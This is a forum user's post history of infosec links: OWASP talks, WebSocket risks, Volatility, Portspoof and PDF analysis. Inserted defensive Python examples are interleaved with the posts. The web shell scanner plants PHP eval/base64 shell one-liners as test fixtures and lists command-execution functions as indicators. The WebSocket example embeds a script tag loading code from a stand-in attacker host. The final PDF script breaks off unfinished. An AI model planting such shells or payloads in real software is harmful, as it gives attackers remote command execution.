Everything posted by Nytro
-
Stop it with this password crap already.
-
Owasp - Old Webshells, New Tricks With Ryan Kazanciyan, Mandiant

Description:

The Presentation

Web shells, malicious scripts that give an attacker the ability to upload files, execute commands, conduct reconnaissance and perform other command-and-control activities on a compromised web server, are nothing new. They have been in the wild ever since the first web server and application exploits reared their ugly heads over a decade ago. Modern application security and server hardening processes have rendered them all but obsolete, tools for desperate script kiddies, right? Wrong. In this presentation we will discuss how web-based backdoors continue to be leveraged by sophisticated, targeted attackers and the challenges they pose to forensic analysts conducting large-scale investigations. In particular, we will focus on the use of web shells as a post-exploitation mechanism for maintaining persistence in an environment (a backup method of remote access) rather than as a tool used in the initial entry vector. We will focus on the forensic artifacts that use of such malware leaves behind on the host and on the network, and discuss techniques for rapidly identifying unknown web-based malware across servers.

The Speakers

Ryan Kazanciyan
Ryan Kazanciyan is a Principal Consultant with Mandiant and has ten years of experience specializing in incident response, forensic analysis, penetration testing, and web application security. He has spent the past four years leading investigation and remediation efforts for highly targeted attacks affecting organizations in the defense, technology, utilities, government, and financial services sectors. Mr. Kazanciyan has experience with analysis of host- and network-based indicators of compromise, disk and memory forensics, and malware identification and triage. He also has an extensive background managing and executing large penetration testing and application security assessments. Mr. Kazanciyan has leveraged his consulting experience to lead training sessions for a variety of audiences in law enforcement, the federal government, and corporate security groups. He has taught courses on incident response, forensic analysis, penetration testing, and web application security. He has also presented at industry and security conferences including Black Hat, DoD CyberCrime, ShmooCon, Infragard, and ISACA.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Old Webshells, New Tricks with Ryan Kazanciyan, Mandiant on Vimeo
Source: Owasp - Old Webshells, New Tricks With Ryan Kazanciyan, Mandiant
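An added example, not code from the talk or from Mandiant, of the kind of host-side sweep the abstract refers to: score every script in a web root on the constructs web shells rely on (eval of request data, decoders, command execution), and compare each file against a known-good hash baseline so that a backdoor appended to a legitimate file surfaces even when its score alone would not. The web root, the file contents, the indicator weights and the threshold are all constructed or assumed for the example.

```python
"""Sweep a web root for files that look like web shells.

Added example, not code from the Mandiant talk. Each candidate file is
scored on constructs web shells rely on (eval of request data, decoders,
command execution), and compared with a known-good hash baseline so that
new files and modified legitimate files surface even when their score is
low. The sample web root written below is constructed for the example.
"""
import hashlib
import os
import re
import tempfile
import time

# Indicator patterns with weights (assumed values; tune per application).
INDICATORS = [
    (r"\beval\s*\(", 3),
    (r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", 2),
    (r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", 3),
    (r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", 1),          # request data used directly
    (r"\bpreg_replace\s*\(\s*['\"].*?/[a-z]*e['\"]", 3),  # /e modifier = eval
    (r"\b(assert|create_function)\s*\(", 2),
    (r"\bmove_uploaded_file\s*\(", 2),
    (r"Request\.(Form|QueryString|Item)", 1),           # ASP/ASPX input
]
COMPILED = [(re.compile(p, re.IGNORECASE | re.DOTALL), w) for p, w in INDICATORS]
WEB_EXTENSIONS = {".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp", ".cfm"}


def score_source(source: str) -> int:
    """Summed indicator weight for one file's contents."""
    return sum(w * len(rx.findall(source)) for rx, w in COMPILED)


def sha256_file(path: str) -> str:
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def scan_web_root(root: str, baseline: dict, threshold: int = 4, recent_days: int = 7) -> list:
    """Return sorted (relative path, score, reasons) for files that exceed
    the threshold or are new/changed against the baseline of known hashes."""
    hits, cutoff = [], time.time() - recent_days * 86400
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", errors="replace") as fh:
                score = score_source(fh.read())
            reasons = []
            if score >= threshold:
                reasons.append("indicator score %d" % score)
            if rel not in baseline:
                reasons.append("not in baseline")
            elif baseline[rel] != sha256_file(path):
                reasons.append("hash differs from baseline")
            if not reasons:
                continue  # known-good hash and low score
            if os.path.getmtime(path) > cutoff:
                reasons.append("modified in last %d days" % recent_days)
            hits.append((rel, score, reasons))
    return sorted(hits)


def make_sample_root():
    """Constructed web root: two legitimate files recorded in a baseline,
    then a dropped one-liner shell and a backdoor appended to a real file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "admin"))
    os.makedirs(os.path.join(root, "img"))
    legit = {
        "index.php": "<?php echo 'hello'; ?>\n",
        "admin/upload.php": "<?php\nif (isset($_FILES['f'])) {\n"
                            "  move_uploaded_file($_FILES['f']['tmp_name'], "
                            "'uploads/' . basename($_FILES['f']['name']));\n}\n",
    }
    for rel, body in legit.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    baseline = {rel: sha256_file(os.path.join(root, rel)) for rel in legit}
    with open(os.path.join(root, "img", "cache.php"), "w") as fh:
        fh.write("<?php @eval(base64_decode($_POST['x'])); ?>\n")
    with open(os.path.join(root, "admin", "upload.php"), "a") as fh:
        fh.write("// maintenance hook\n@eval(base64_decode($_GET['k']));\n")
    return root, baseline


if __name__ == "__main__":
    root, baseline = make_sample_root()
    for rel, score, reasons in scan_web_root(root, baseline):
        print("%-18s score=%d  %s" % (rel, score, "; ".join(reasons)))
```

Run across many servers, the baseline is what makes this fast: hashes from a clean build or package manifest let you skip the bulk of the tree and only read the files that are new or changed, and the score then tells you which of those deserve a look first.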
-
Owasp - Pentesting Smart Grid Web Apps With Justin Searle, Utilisec

Description:

The Presentation

Web applications have not only conquered most user interfaces in traditional IT markets, they are also quickly replacing most user interfaces in critical control systems such as SCADA, Smart Meters, Distribution Management, and other Smart Grid master servers. And if the servers weren't enough, now they are starting to appear in the embedded devices deployed in the field. This talk will discuss all the places where web applications and web services are being used in today's modern electrical grid. We will also discuss the challenges that penetration testers new to critical control systems will face and how they can successfully overcome those challenges.

The Speakers

Justin Searle
Justin Searle is a Managing Partner of UtiliSec, specializing in Smart Grid security architecture design and penetration testing. Justin led the Smart Grid Security Architecture group in the creation of NIST Interagency Report 7628 and currently plays key roles in the Advanced Security Acceleration Project for the Smart Grid (ASAP-SG), National Electric Sector Cybersecurity Organization Resources (NESCOR), and Smart Grid Interoperability Panel (SGIP). Justin has taught courses in hacking techniques, forensics, networking, and intrusion detection for multiple universities, corporations, and security conferences, and is currently an instructor for the SANS Institute. In addition to electric power industry conferences, Justin frequently presents at top security conferences such as Black Hat, DEFCON, OWASP, and AusCERT. Justin co-leads prominent open source projects including the Samurai Web Testing Framework, Middler, Yokoso!, and Laudanum. Justin has an MBA in International Technology and is a CISSP and SANS GIAC certified Incident Handler (GCIH), Intrusion Analyst (GCIA), and Web Application Penetration Tester (GWAPT).

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Pentesting Smart Grid Web Apps with Justin Searle, Utilisec on Vimeo
Source: Owasp - Pentesting Smart Grid Web Apps With Justin Searle, Utilisec
-
[h=1]HTML5 WebSockets Identified As Security Risk[/h]
[h=3]WebSockets offer the promise of improved TCP connections, but do they also invite new forms of attack on your applications and infrastructure?[/h]
By Sean Michael Kerner | July 31, 2012

In the modern world of web development there is a set of new and emerging specifications sometimes grouped under the moniker HTML5. One of them is the WebSocket API, which enables two-way communication between browser and server over a single long-lived TCP connection. WebSockets promise lower-latency, full-duplex communication than the traditional HTTP request/response model, but according to a pair of security researchers there is a hidden risk.

Speaking at the Black Hat conference last week, Qualys engineers Sergey Shekyan and Vaagn Toukharian detailed how WebSockets could be exploited for malicious gain. Support for WebSockets is currently available in the latest Chrome, Firefox, Safari and IE 10 browsers. According to the two researchers, WebSockets are already in use by websites and embedded applications around the world, and often without proper security.

"We think that user capacity may be an issue with WebSockets if it's not implemented in the right way," Toukharian told eSecurity Planet. "WebSockets can be used for lots of things, but they shouldn't be used for all items on a web page." He stressed that WebSockets don't make sense in applications that don't need bi-directional communication or a fast response time.

Different browsers also support WebSockets in different ways. In particular, Shekyan noted that some important things are not implemented in WebKit, the engine that powers Chrome and Safari. Shekyan explained that the current WebSocket specification states that a client should have only one WebSocket in the connecting state to a given host and port at a time. According to Shekyan, WebKit does not implement that requirement.

"So if a server is not accepting connections fast enough, then you shouldn't try and open a new connection before the previous one was accepted," Shekyan said. "That would prevent DoS (Denial of Service) attacks." According to Shekyan, an attacker could theoretically open an unlimited number of WebSocket connections from a single WebKit browser to a third-party server. Firefox also doesn't quite follow the specification, allowing up to 200 connections.

Toukharian added that from a security perspective WebSockets don't make applications more secure, but they do provide a new attack vector. Traditional web attacks like Cross-Site Scripting (XSS) and Man-in-the-Middle (MitM) can find a new home in WebSocket traffic. "Basically, if an attacker has access to content that initiates a WebSocket connection, then that connection could be compromised," Shekyan said.

The other key issue is that, since WebSocket technology is still relatively new, most firewall and IPS devices are not aware of it. As such, WebSocket traffic is not inspected or secured by the same mechanisms as other web traffic. "If someone can deliver malicious content over WebSockets, the rest of the protection is useless," Shekyan said. "Vendors should really start looking at handling the WebSocket protocol."

The challenge is one of usage. Toukharian added that if there were more use of WebSockets, vendors would likely take more notice. Shekyan noted that he talked with one firewall vendor about the risk of not supporting WebSockets; the surprising response was that WebSockets are not currently a major attack vector and so it doesn't matter.

"Malware delivery via WebSockets becomes easier since IDS and firewall technology can't see what is being delivered," Toukharian said. "It's just a matter of unmasking the data and looking at the traffic, it's not very hard. Our hope is that firewall and IPS vendors pick it up as soon as possible," Toukharian added.

Source: HTML5 WebSockets Identified As Security Risk - eSecurity Planet
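"Unmasking the data" is the whole trick for an inspecting device: every client-to-server frame is XOR-masked with a 4-byte key that sits in the frame header, so a signature that matches the cleartext never matches the wire bytes. The following is an added example, not from the article or the Qualys talk, that builds masked frames the way a browser would (RFC 6455 framing), parses them back, and runs a naive content signature over both the wire bytes and the unmasked payload. The two frames in the capture and the `<script` signature are constructed for the example.

```python
"""Decode client-to-server WebSocket frames (RFC 6455) to expose the payload.

Added example, not from the eSecurity Planet article or the Qualys talk.
Client frames are XOR-masked with a 4-byte key carried in the header, so
an IDS that does not unmask sees only noise; this shows how little work the
unmasking is. The capture bytes built below are constructed for the example.
"""
import os
import struct

SIGNATURE = b"<script"   # stand-in for an IDS content rule (constructed)


def build_client_frame(payload: bytes, opcode: int = 0x1, mask_key: bytes = None) -> bytes:
    """Build one FIN frame as a browser sends it: MASK bit set, 7/16/64-bit length."""
    if mask_key is None:
        mask_key = os.urandom(4)
    header = bytes([0x80 | opcode])          # FIN=1, RSV=000, opcode
    n = len(payload)
    if n < 126:
        header += bytes([0x80 | n])          # MASK=1, 7-bit length
    elif n < 65536:
        header += bytes([0x80 | 126]) + struct.pack("!H", n)
    else:
        header += bytes([0x80 | 127]) + struct.pack("!Q", n)
    masked = bytes(b ^ mask_key[i % 4] for i, b in enumerate(payload))
    return header + mask_key + masked


def parse_frame(buf: bytes) -> dict:
    """Parse the frame at the start of buf; returns flags, key, unmasked payload
    and how many bytes were consumed (so a stream can be walked frame by frame)."""
    if len(buf) < 2:
        raise ValueError("short frame")
    b0, b1 = buf[0], buf[1]
    fin, opcode = bool(b0 & 0x80), b0 & 0x0F
    masked, length = bool(b1 & 0x80), b1 & 0x7F
    pos = 2
    if length == 126:
        (length,) = struct.unpack("!H", buf[pos:pos + 2])
        pos += 2
    elif length == 127:
        (length,) = struct.unpack("!Q", buf[pos:pos + 8])
        pos += 8
    key = b""
    if masked:
        key = buf[pos:pos + 4]
        pos += 4
    data = buf[pos:pos + length]
    if len(data) != length:
        raise ValueError("truncated payload")
    if masked:
        data = bytes(b ^ key[i % 4] for i, b in enumerate(data))
    return {"fin": fin, "opcode": opcode, "masked": masked, "mask_key": key,
            "payload": data, "consumed": pos + length}


def inspect_stream(stream: bytes) -> list:
    """Walk a captured client->server byte stream, unmask each frame and run the
    signature over the wire bytes (what a mask-unaware IDS sees) and the cleartext."""
    findings, pos = [], 0
    while pos < len(stream):
        frame = parse_frame(stream[pos:])
        raw = stream[pos:pos + frame["consumed"]]
        pos += frame["consumed"]
        findings.append({
            "opcode": frame["opcode"],
            "payload": frame["payload"],
            "wire_hit": SIGNATURE in raw,
            "clear_hit": SIGNATURE in frame["payload"],
        })
    return findings


def sample_stream() -> bytes:
    """Constructed capture: a benign JSON message, then a frame carrying injected
    HTML, both masked with fixed keys so the run is reproducible."""
    return (build_client_frame(b'{"msg":"hi"}', mask_key=b"\x12\x34\x56\x78") +
            build_client_frame(b'<script src="//evil.example/x.js"></script>',
                               mask_key=bytes.fromhex("deadbeef")))


if __name__ == "__main__":
    for f in inspect_stream(sample_stream()):
        print("opcode=%d wire_hit=%s clear_hit=%s payload=%r"
              % (f["opcode"], f["wire_hit"], f["clear_hit"], f["payload"]))
```

The second frame shows the point: the signature misses on the wire bytes and fires only after the four-byte XOR, and the key to undo it is sitting in plain view in the same frame. A server-to-client frame carries no mask at all (and a client frame without the MASK bit is a protocol error the server must reject), so an inspecting device only needs this step in one direction.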
-
[h=2]Update volatility v2.1 – An advanced memory forensics framework[/h]
The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated but offer visibility into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and to provide a platform for further work in this exciting area of research.

What's new in 2.0 (highlights of that release):
- Restructured and depolluted namespace
- Usage and development documentation
- New configuration subsystem
- New caching subsystem
- New pluggable address spaces with automated election
- New address spaces (i.e. EWF, Firewire)
- Updated object model and profile subsystems (VolatilityMagic)
- Support for Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7
- Updated scanning framework
- Volshell integration
- Over 40 new plugins!

Volatility supports investigations of the following x86 (32-bit) memory images:
- Microsoft Windows XP Service Pack 2 and 3
- Microsoft Windows 2003 Server Service Pack 0, 1 and 2
- Microsoft Vista Service Pack 0, 1 and 2
- Microsoft 2008 Server Service Pack 1 and 2 (there is no SP 0)
- Microsoft Windows 7 Service Pack 0 and 1

Volatility currently provides the following extraction capabilities for memory samples:
- Image date and time
- Running processes
- Open network sockets
- Open network connections
- DLLs loaded for each process
- Open files for each process
- Open registry keys for each process
- OS kernel modules
- Mapping physical offsets to virtual addresses
- Virtual Address Descriptor information
- Addressable memory for each process
- Memory maps for each process
- Extract executable samples
- Scanning examples: processes, threads, sockets, connections, modules

Download | Read more
Earlier post: Volatility v2.0 An advanced memory forensics framework release
-
Introduction To Reverse Engineering Software

Creator: Matt Briggs
License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/)
Lab Requirements: Windows system with IDA Pro (Free 5.0 is acceptable). Microsoft Visual Studio 2008 redistributable package.
Class Textbook: Reversing: Secrets of Reverse Engineering by Eldad Eilam.
Recommended Class Duration: 2 days
Creator Available to Teach In-Person Classes: Yes

Author Comments: Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day, from recreating outdated and incompatible software, to understanding malicious code, to exploiting weaknesses in software. In this course we will explore what drives people to reverse engineer software and the methodology and tools used to do it. Topics include, but are not limited to:
•Uses for RE
•The tricks and pitfalls of analyzing compiled code
•Identifying calling conventions
•How to navigate x86 assembly using IDA Pro
•Identifying control flows
•Identifying the Win32 API
•Using a debugger to aid RE
•Dynamic analysis tools and techniques for RE

During the course students will complete many hands-on exercises. This class will serve as a prerequisite for a later class on malware analysis. Before taking this class you should take Introduction to Intel x86 or have equivalent knowledge.

Class Materials
All Material (TiddlyWiki (html+javascript) & analyzed binaries (PE)). To bypass exe filters, e.g. so this can be sent through email, this is an encrypted zip with a password of "reclass2011". All of the .exe files have been renamed to .ex_. On Mac OS X 10.6 and below, you will have to open the zip file from Terminal in order to get the password prompt.

Full quality downloadable QuickTime, h.264, and Ogg videos at Archive.org:
Day 1 Part 1 (57:36, 706 MB)
Day 1 Part 2 (1:17:18, 1 GB)
Day 1 Part 3 (29:49, 453 MB)
Day 1 Part 4 (38:36, 530 MB)
Day 1 Part 5 (36:06, 500 MB)
Day 2 Part 1 (49:29)
Day 2 Part 2 (54:58)
Day 2 Part 3 (40:09)
Day 2 Part 4 (1:10:10)
Day 2 Part 5 (58:51)
(8:33:02 total, sans lab time)

The videos are useful for students, but even more useful for potential instructors who would like to teach this material. By watching the video, you will better understand the intent of some slides which do not stand on their own. You are recommended to watch the largest size video so that the most possible text is visible without having to follow along in the slides.

Revision History:
07-08-2012 - Day 2 videos uploaded to YouTube, & both days uploaded to Archive.org
07-01-2012 - Day 1 videos uploaded to YouTube
01-27-2012 - Created some 'missing' content, fixed a few flaws, and added a write-up for the last task
06-16-2011 - Initial class content upload

If you have used and modified this material, we would appreciate it if you submit your modified version for publishing here, so that all versions can benefit from your changes.

Source: IntroductionToReverseEngineering
-
Portspoof - service signature obfuscator (more pain for port scanners)

From: Piotr Duszynski <piotr () duszynski eu>
Date: Sun, 05 Aug 2012 09:49:15 +0200

Hi,

Short description of the soft and the concept:

The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. The general goal of the program is to make the port scanning process very slow and its output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task.

More info at: Portspoof - About

Note: This is an idea that I have had in mind for a long time and finally I found some time to implement it. It is still an early release and some parts of the code aren't perfect, but I'll be working on that :]

Cheers,
Piotrek

From the project page: the portspoof program is meant to be a lightweight, fast, portable and secure addition to any firewall system or security infrastructure. The general goal of the program is to make port scanning software (Nmap/Unicornscan/etc.) slow and its output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task. Here is an example nmap scan result against a system running portspoof:
- the default scan took about 800s (instead of 20s)
- CPU usage was at 0.5%
- memory usage was at 0.5%
- one legitimate service is running on a port in the range 1-65535; all the rest are fake
- portspoof binds to only one port

Check portspoof in action (live demo, will sometimes hang due to the development process): nmap -sV 54.247.124.68

Portspoof is still an early work in progress and although stable and working it will require a lot of additional work (preferably along with a good beverage).

Source: Full Disclosure: Portspoof - service signature obfuscator (more pain for port scanners)
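How one listener can answer for 65535 ports: the firewall redirects every TCP port that is not a real service to the single port the responder binds, the responder recovers the port the scanner actually aimed at, and answers with a banner that fits that port. The following is an added example in that spirit, not Portspoof's own code or signature database: it binds one port, reads the pre-redirect destination through the Linux netfilter `SO_ORIGINAL_DST` socket option (falling back to the listener's own port when no redirect is in place, as in the stand-alone run here), and picks a banner from a small constructed table. The iptables rule in the docstring and the banners themselves are assumptions for the example.

```python
"""Minimal port-spoofing responder in the spirit of Portspoof.

Added example, not Portspoof's own code. On Linux the redirect is done with
netfilter, e.g.
  iptables -t nat -A PREROUTING -p tcp --dport 1:65535 -j REDIRECT --to-ports 4444
(exempting the real services first), and the responder recovers the port the
scanner aimed at through SO_ORIGINAL_DST. The banner table is a constructed
subset; Portspoof ships a far larger signature database.
"""
import socket
import struct
import threading

# Original destination port -> banner. Constructed values for the example.
BANNERS = {
    21: b"220 ProFTPD 1.3.3 Server ready.\r\n",
    22: b"SSH-2.0-OpenSSH_5.3\r\n",
    25: b"220 mail.example ESMTP Postfix\r\n",
    110: b"+OK Dovecot ready.\r\n",
    3306: b"J\x00\x00\x00\x0a5.1.63\x00",
}
GENERIC = [b"220 Welcome\r\n", b"HTTP/1.0 400 Bad Request\r\n\r\n",
           b"* OK IMAP4rev1 Ready\r\n"]

SO_ORIGINAL_DST = 80                    # from <linux/netfilter_ipv4.h>
SOL_IP = getattr(socket, "SOL_IP", 0)


def original_dst_port(conn: socket.socket) -> int:
    """Port the client connected to before REDIRECT rewrote it. Without a
    netfilter entry (or off Linux) fall back to the listener's own port."""
    try:
        raw = conn.getsockopt(SOL_IP, SO_ORIGINAL_DST, 16)  # struct sockaddr_in
        return struct.unpack("!H", raw[2:4])[0]
    except (OSError, struct.error):
        return conn.getsockname()[1]


def pick_banner(port: int) -> bytes:
    """Known port gets its banner; any other port gets a generic one keyed on
    the port number so repeated scans see the same 'service'."""
    return BANNERS.get(port, GENERIC[port % len(GENERIC)])


def make_listener(port: int = 0) -> socket.socket:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(64)
    return srv


def serve(srv: socket.socket, max_conns: int = None) -> None:
    """Answer every accepted connection with a banner and close it; the
    scanner's version probe then has something to 'identify'."""
    handled = 0
    while max_conns is None or handled < max_conns:
        conn, _ = srv.accept()
        with conn:
            conn.sendall(pick_banner(original_dst_port(conn)))
        handled += 1


def demo():
    """Stand-alone check on a random loopback port: returns (port, bytes a
    scanner would read)."""
    srv = make_listener(0)
    port = srv.getsockname()[1]
    t = threading.Thread(target=serve, args=(srv, 1), daemon=True)
    t.start()
    with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
        data = c.recv(1024)
    t.join(5)
    srv.close()
    return port, data


if __name__ == "__main__":
    port, data = demo()
    print("port %d -> %r" % (port, data))
```

With the redirect rule in place, `nmap -sV` against the host has to run its version probes against every port and gets a plausible answer each time, which is where the 800-second scan time in the post comes from; without the rule the responder only ever answers for the one port it binds.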
-
Owasp - Unraveling Some Of The Mysteries Around Dom-Based Xss With Dave Wichers, Aspect Security, Coo

Description:

Slides: https://www.owasp.org/images/f/f4/ASDC12-Unraveling_some_of_the_Mysteries_around_DOMbased_XSS.pdf

The Presentation

DOM-based XSS was first revealed to the world back in 2005 by Amit Klein, when it was an interesting theoretical vulnerability. In 2012, with the push towards Web 2.0 well into the mainstream, DOM-based XSS has become a very commonly uncovered and exploited vulnerability, but it is poorly understood. This talk will focus on the full range of issues around DOM-based XSS. It will start with a discussion of the technical details of the vulnerability, the true nature of the risk it introduces (both likelihood and impact), and some new terminology and updated definitions about what truly is a DOM-based XSS vulnerability as compared to the standard Stored and Reflected XSS that the community is well aware of. It will then discuss the difficulties that security analysts face when trying to find DOM-based XSS flaws, and provide recommended analysis techniques that help move DOM-based XSS discovery from an art towards more of a science. And finally, it will discuss simple techniques for avoiding DOM-based XSS issues in the first place as well as how to mitigate issues that are uncovered during a security review.

This talk will include discussion of numerous open source resources that are available on this topic. OWASP has numerous articles on DOM-based XSS, including a definition article DOM_Based_XSS, an OWASP testing guide article Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003), and the DOM_based_XSS_Prevention_Cheat_Sheet, and there are also other open source articles from leading researchers like Stefano Di Paola's Introduction to DOM-Based XSS as well. The speaker has already contributed to all of these OWASP articles and, in preparation for this talk, plans to review and contribute additional enhancements to each of them in order to make the author's recommendations publicly available to the web security community in a very broad manner, far beyond just delivering this talk at AppSec DC. The talk will also survey how open source proxy tools like OWASP ZAP and WebScarab, along with Firebug and Chrome's developer tools, can be used to track down DOM-based XSS issues within an application. Open source DOM-based XSS detection tools, such as DOMinator, will also be showcased in this talk.

This talk was delivered at the conference. The presentation is now available online here.

The Speakers

Dave Wichers
Dave Wichers is a cofounder and the Chief Operating Officer (COO) of Aspect Security, a consulting firm focused exclusively on application security that supports a worldwide clientele with critical applications in the government, defense, financial, healthcare, services and retail sectors. Dave and his team at Aspect Security are founding members of the Open Web Application Security Project (OWASP), and have made major industry contributions including the OWASP Top Ten, Enterprise Security API (ESAPI), and Application Security Verification Standard (ASVS). He is also a long-time contributor to OWASP itself, including being a member of the OWASP Board since it was formed in 2003, and established the OWASP conferences program through his role as OWASP Conferences Chair from 2005 through 2009. Dave has over 20 years of experience in the information security field, and has focused exclusively on application security since 1998. At Aspect, in addition to his COO duties, he is Aspect's application security courseware lead, one of their chief instructors, and provides a wide variety of application security consulting services to Aspect's clients. This includes frequent application security verification efforts involving both code review and application penetration testing for both commercial and Government clients. Prior to starting Aspect, he ran the Application Security Services Group at Exodus Communications. Dave has a Bachelors and Masters degree in Computer Science, and is a CISSP and a CISM.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Unraveling some of the Mysteries around DOM-based XSS with Dave Wichers, Aspect Security, COO on Vimeo
Source: Owasp - Unraveling Some Of The Mysteries Around Dom-Based Xss With Dave Wichers, Aspect Security, Coo
-
Owasp - Real World Backdoors On Industrial Devices With Ruben Santamarta Ioactive

Description:

The Presentation

ICS security, or the lack of it, has been hogging the headlines in recent months. The underlying issue is that, in a post-Stuxnet era, industrial control systems are facing a totally new scenario: they are no longer a safe place but a potential and valuable target. A lot of questions arise, but maybe the most important one is: are they prepared to face this threat? This presentation details the whole process of analyzing industrial devices, including methods such as reverse engineering and open source intelligence. The results of this approach are also elaborated, showing real cases of backdoors found on widely deployed PLCs and smart meters.

The Speakers

Ruben Santamarta
Ruben Santamarta is a European security researcher specialized in offensive security. He works as a security researcher for IOActive. He has discovered dozens of vulnerabilities in products from leading companies such as Microsoft, Apple and Oracle. Ruben is currently focused on the ICS security field, reporting and releasing flaws in industrial software and hardware.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Real World Backdoors on Industrial Devices with Ruben Santamarta IOActive on Vimeo
Source: Owasp - Real World Backdoors On Industrial Devices With Ruben Santamarta Ioactive
-
Penetration Testing The Network Using Core Impact

Description: In this video the author introduces CORE IMPACT, a penetration testing framework used for vulnerability assessments. The demonstration covers the basic usage of CORE IMPACT and how it is applied to a vulnerability assessment of the target network.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Penetration Testing The Network Using Core Impact
-
[h=3]PDF Analysis + A Request[/h]
[h=2]Sunday, August 05, 2012[/h]
I am going to make my request first. Those who know me know I am a bit gaga for photography. One of my pictures was chosen for the exhibition 'London: A Picture of Sustainability'. Please take a second to vote for my photo (if you like it, of course!). I was honored to get this far and it would be awesome to be chosen to win! Definitely look at all of them; it's neat to see what everyone's definition of 'sustainability' is. All the photographs will be available for sale! I am invited to the Exhibition Opening! What do I wear?! Do I need to suit up?! I thought IRs were stressful....

I can't ask you guys for something without giving something in return... so I present not one, but TWO videos on PDF analysis! I will be looking at one PDF via peepdf (the new version) in REMnux and then in PDFStreamDumper. More than one way to peel a potato.

The file I am using for this demo is 'CVE-2009-4324_PDF_2009-11-30_note200911.pdf=1ST0DAYFILE', which I grabbed from a malicious document collection from Contagio. What would we do without Contagio?

UPGRADING TO PEEPDF 0.2

If you already have peepdf, it's quite simple to update. Simply type in: $ sudo peepdf.py -u

Then everything should be lovely jubbley. If not, you can go to where you have peepdf installed (in REMnux it's in /usr/local/bin) and run the command directly from there.

Ok, I lied, you need to do a few more things. You also need to install pylibemu, and maybe update libemu while you are at it. Jose recommends using git, as the SourceForge packages are outdated. Check the readme for other dependencies you may want. I was also having issues even after this: peepdf was not seeing my pylibemu library. I noticed when reinstalling everything that I did not have Python bound to libemu. I did some browsing and this fixed my issue. Thank you Alex from Canada!

If you do not have peepdf you can go to the main site directly and download it for your system, or you can even find the older version on REMnux (a great free VM for analysing malware) and simply upgrade it yourself!

PDF STREAM DUMPER

I really love this tool as well. I know it's 'cooler' to use the command line, but you have to respect a great GUI tool which is amazingly versatile. Again, using the same PDF as with peepdf, I show analysis being done with this Windows tool. You can grab the program at the sandsprite website.

That's all for now folks. Please, please, please vote in the photo competition. And a big thank you to Jose for all your assistance with peepdf! If you ever find yourself in London I owe you a beer.

Source: Sketchymoose's Blog: PDF Analysis + A Request
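The first thing peepdf or PDFStreamDumper give you on a file like this is the keyword and stream picture: which action and script names appear, whether any are hex-escaped to dodge naive greps, and what the compressed streams decode to. The following is an added example, not from the blog post, from peepdf or from PDFStreamDumper, that does that triage step on a constructed PDF built inline (it is not the Contagio sample the post analyses): it normalises `#xx` escapes in names, counts the keywords that matter, inflates FlateDecode streams and flags script-like content in them. The keyword list and the script heuristic are assumptions chosen for the example.

```python
"""Keyword and stream triage of a PDF, the first step peepdf/PDFStreamDumper
perform on a suspect file.

Added example, not code from the blog post, peepdf or PDFStreamDumper. It
normalises hex-escaped names (/J#61vaScript is /JavaScript), counts the
action and script keywords that matter for malicious-document triage,
inflates FlateDecode streams and reports script-like content in them. The
sample PDF is constructed inline; it is not the Contagio file from the post.
"""
import re
import zlib

KEYWORDS = ["/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
            "/EmbeddedFile", "/RichMedia", "/ObjStm", "/Encrypt"]
# Crude script heuristic for decoded streams (assumed for the example).
SCRIPT_RE = re.compile(rb"app\.alert|eval\(|unescape\(|util\.printf")
# A stream object: its dictionary (no nested '>>' handling; fine for triage)
# followed by the stream keyword, EOL, data, EOL, endstream.
STREAM_RE = re.compile(rb"<<((?:[^>]|>(?!>))*)>>\s*stream\r?\n(.*?)\r?\nendstream",
                       re.DOTALL)


def normalise_names(data: bytes) -> bytes:
    """Resolve #xx escapes so obfuscated names count as their plain form."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> dict:
    data = normalise_names(data)
    counts = {}
    for kw in KEYWORDS:
        # the name must end at a delimiter so /JS does not also count /JSX
        pattern = re.escape(kw.encode()) + rb"(?![A-Za-z0-9])"
        counts[kw] = len(re.findall(pattern, data))
    return counts


def extract_streams(data: bytes) -> list:
    """(dictionary, decoded body) per stream; FlateDecode bodies are inflated,
    anything that fails to inflate is returned raw."""
    out = []
    for m in STREAM_RE.finditer(data):
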